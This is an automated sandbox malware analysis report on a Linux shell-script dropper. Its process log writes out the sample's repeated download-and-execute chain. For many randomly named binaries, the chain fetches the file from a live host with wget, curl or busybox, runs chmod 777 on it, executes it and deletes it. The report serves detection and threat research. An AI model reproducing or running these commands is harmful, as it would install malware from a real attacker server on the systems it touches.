Malware Analysis Report

2024-11-13 17:48

Sample ID 241110-bdke4awcpp
Target 2408085a258a318bc587e649a5e777ad.bin
SHA256 9b233ed6c31bc80fa0c4571afa427c1dce8edbe9ce5fe2c2cbc640926d5d64f6
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9b233ed6c31bc80fa0c4571afa427c1dce8edbe9ce5fe2c2cbc640926d5d64f6

Threat Level: Shows suspicious behavior

The file 2408085a258a318bc587e649a5e777ad.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 01:01

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

66s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
